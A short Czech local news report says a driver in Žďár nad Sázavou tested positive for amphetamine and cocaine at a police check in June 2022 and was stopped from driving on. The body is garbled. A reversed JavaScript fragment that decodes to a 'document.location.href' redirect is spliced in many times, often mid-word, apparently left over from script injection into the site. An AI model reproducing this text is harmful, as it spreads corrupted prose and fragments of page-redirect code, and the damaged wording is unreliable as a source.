Rainbow page separator

Test u řidiče jedoucího Žďárem vykázal amfetamin a kokain

Čtvrtek, 30. června 2022

Žďár nad Sázavou / S výzvou ze strany policistů k podrobení se lékařskému vyšetření spojenému s odběrem biologického materiálu souhlasil dvaatřicetiletý řidič au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobilu značky Volkswagen, kterého ve žďárské ulici U Hrázek v pondělí 27. června před devá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou hodinou ráno zastavila a zkontrolovala policejní hlídka. Součástí běžné policejní kontroly byl [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];totiž rovněž orientační test zaměřený na pří[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomnost omamných a psychotropních látek, který u šoféra vyšel pozitivní na amfetamin a kokain. V [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to případě cesta řidiče na místě skončila.
„V další jízdě už zkontrolovaný řidič pokračovat nesměl. Policisté případ zadokumen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovali jako přestupek na úseku dopravy,“ informovala o události policejní mluvčí Stanislava Rázlová.